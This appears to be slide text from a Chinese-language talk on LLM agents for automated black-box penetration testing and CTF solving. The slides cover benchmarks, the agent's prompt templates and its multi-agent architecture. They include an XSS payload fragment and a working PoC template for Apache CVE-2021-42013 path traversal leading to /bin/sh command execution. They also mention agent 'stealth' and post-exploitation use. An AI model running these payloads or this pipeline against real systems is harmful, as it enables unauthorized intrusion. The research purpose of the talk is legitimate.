胡宇睿|xjtuHunter
About me
胡宇睿| xjtuHunter
西安交通大学网络空间安全学院博士生
研究领域:开源漏洞治理、AI赋能安全、高级威胁狩猎,主导的多项大模型+网络安全研究工作发表于ASE、S&P等国际顶级会议。
多年攻防与CTF赛事经验,连续四年教育部攻防演练第一名,2025年国家护网攻击队主力成员。
持续的AI+应用开发者,开发的多项大模型+安全产品投入企业落地场景,积极探索AI+网络安全的工业化经验。
PART 01PART 02PART 03经验洞察Agent的开发之道架构为王黑盒渗透的实战解决方案细节至上小镇做题家的生存智慧目录CONTENTSPART 04未来已来打造AI+网安浪潮的掌舵手
PART 01
经验洞察——Agent的开发之道
AI下半场:从“有无问题”到“价值问题”
上半场:算力与数据驱动的基础设施建设——“更大、更多、更快”
下半场:架构与评估驱动的价值实现——“更准、更稳、更可用”
垂域专用Agent
评估标准
评估标准:Agent架构的设计锚点
通用基准:MMLU(15908题)-Computer security(116题)
真实渗透测试任务
静态知识vs.动态操作孤立知识点vs.多步复杂流程理论最优解vs.实战适应性结果判断简单vs.结果验证复杂
孤立、去上下文的知识切片有状态的、多步骤的复杂流程
答案对错即时可判
综合大量反馈验证
没有固定答案
评估标准:Agent架构的设计锚点
专有基准:XBOW(104题)
覆盖多种CTF种常见的漏洞类型,采用真实CTF夺旗结果评判Agent对于漏洞利用的自动化完成度
AutoPenBench(33题)涵盖Web、网络、密码学等多领域,采用里程碑式评分,评估多步骤任务的自动化完成度
核心评估维度:
侦查覆盖率:能否发现所有开放的端口、隐藏的路径、未引用的API端点?漏洞检出率与误报率:能否准确识别真实漏洞(TP),并有效降低误报(FP)?利用成功率:发现的漏洞能否被成功利用(例如,获取shell、提取敏感数据)?攻击链构建能力:能否将多个漏洞串联,形成完整的攻击路径?
反思与记忆
多智能体协同
PART 02
——黑盒渗透的实战解决方案
设计背景:漏洞检测从“盲打”到“精打”
漏洞存在于业务逻辑的交互中,而非孤立的代码里。
XBEN-022
孤立检测:高误报/漏报
文件上传-> LFI-> SSTI
1)理解error_type在上传与文件包含接口的数据流传递关系
控制依赖:用户登录->获取令牌->后台权限操作
2)综合多个漏洞接口顺序调用
数据依赖:下订单->订单列表->查看订单/修改订单/删除订单
XBEN-025、056
降低误报率
SSTI出现在注册最后一步
1)控制流:注册->用户名渲染
场景感知检测:漏洞与业务强关联
关键步骤一:页面探索
你可以根据已有的信息和网站功能进行网页的浏览与探索,你需要在一个回答里把所有需要探索的网页都探索完成。你需要集中于获取更多网页交互请求,即需要进行以下操作:1.你需要尽可能地使用当前已经获取到的关键信息,比如收集到的用户名和密码需要尽可能使用,不要自己直接构造,注意不要爆破参数,每个参数只需要测试最可能的值即可;2.你需要访问所有原页面的url和api接口,保证所有新页面都要访问到,关键信息中可能提示的参数也需要使用,当你构造POST请求参数时需要严格按照页面表单中的参数构造3.尽可能多的访问新网页或对api发送网络请求,只能发送正常请求参数,不可以进行漏洞探测,不可以发送任何危险参数4.使用xml格式返回响应5.如果没有当前页面则为初始请求,访问系统url即可6.不要访问登出功能,不要访问css和图像,不要通过猜测路径获取新页面,如果所有已知的路径均访问完成,返回"任务已完成"即可7.如果是修改用户信息(包括密码)请求,请将修改后的信息和原信息设置为一样,避免篡改信息8.对于工具请求的构造,value由多个xml子标签构成,如果xml子标签中的值出现特殊字符,使用request{request_desc}
CTF URL
Request XML
request GET True
Response
RequestUrlHeaderParam
HeaderContentRedirect
关键步骤一:页面探索
你专注于从页面请求和响应中提取关键信息你需要仔细分析响应页面中的关键信息和请求包中的参数信息给出最终的分析结果,比如注册时提交的用户名密码等键值和页面的响应信息你需要返回xml格式结果,格式如下:页面简单命名(10个字以内){flag_result}
Page
Request
NameDescriptionKey
Response
关键步骤二:场景塑造
你是一个ctf题目解决者,你需要根据历史请求与响应包和获取的关键信息来生成针对业务场景的漏洞检测的思路。你需要一步步推理与得出最终的检测思路,推理步骤如下:1)历史请求中的哪些请求可能关联为业务场景2)该业务场景中的哪些功能点可能存在漏洞3)对于这些漏洞生成xml格式的最终检测思路:漏洞类型,为字母缩写,支持:IDOR(越权)、SSTI、XSS、SQLI、UPLOAD(文件上传漏洞)、LFI(本地文件包含)、CMD(命令注入)、OTHER利用方式的自然语言描述,不需要指明要检测的参数,也不可以描述载荷,概括性介绍利用方法即可...注意:1.请尽量发挥创意,发掘更多可能的solution,请仔细分析当前请求,尽量发现所有可能存在的漏洞点2.不要进行常规漏洞检测思路,如框架、备份文件漏洞等3. OTHER类型漏洞可以提出多种检测思路,尽可能多地提出检测思路......
页面库
页面名称关键信息
页面名称关键信息
关键步骤三:漏洞检测
检测类型SQLI、XSS、UPLOAD、SSTI、LFI、IDOR、CMD、OTHER
强人工经验
知识库
你必须按照以下流程进行XSS漏洞检测:1.不管是否存在过滤,你都需要首先调用工具:来进行载荷的批量检测,工具会进行载荷的批量测试2.分析批量载荷的执行结果,如果未发现利用成功载荷可以根据响应进行载荷变形,使用request工具分步测试3.如果出现某些方法或者网络请求的报错而非载荷本身的报错,调整请求方法重新进行工具调用4.如果所有载荷均无法测试成功,你需要观察页面请求和响应,尝试添加"、>等字符进行逃逸5.你最终必须实现alert('XSS')
SRC=javascript:alert('XSS')>)
......
Payload [a, b, c, ...]-Response xPayload [d, e, ...]-Response y
工具库
整体流程演示-页面探索
整体流程演示-场景塑造
整体流程演示-漏洞检测
PART 03
——小镇做题家的生存智慧
工具调用优化
POC迁移与后利用
name: "Apache HTTP Server 2.4.50 RCE (CVE-2021-42013)"description: "利用Apache HTTP Server 2.4.50的路径规范化缺陷,攻击者通过构造恶意请求绕过访问限制,在受影响服务器上执行任意系统命令,可导致服务器完全被控制、敏感数据泄露或服务不可用。"severity: "critical"
-"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013"
requests:-steps:-method: "POST"path: "/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh"headers:User-Agent: "Mozilla/5.0"Content-Type: "application/x-www-form-urlencoded"body: "echo; echo 'VULN_TEST'"matchers:-type: "word"words: ["VULN_TEST"]condition: "and"-type: "status"status: [200]
常态化题海战术
分布式Agent架构
采用分布式架构设计,将任务管理与任务执行解耦,支持多平台多节点Agent统一调度
-提升并发效率-增加后端隐蔽性-天然的后渗透框架
比赛解题规划
赛段周期:3h
单次做题周期:30min|单次并发做题数:3|并发进程数:4
PART 04
未来已来——打造AI+网安浪潮的掌舵手
未来规划
THANKS
演讲人TITLE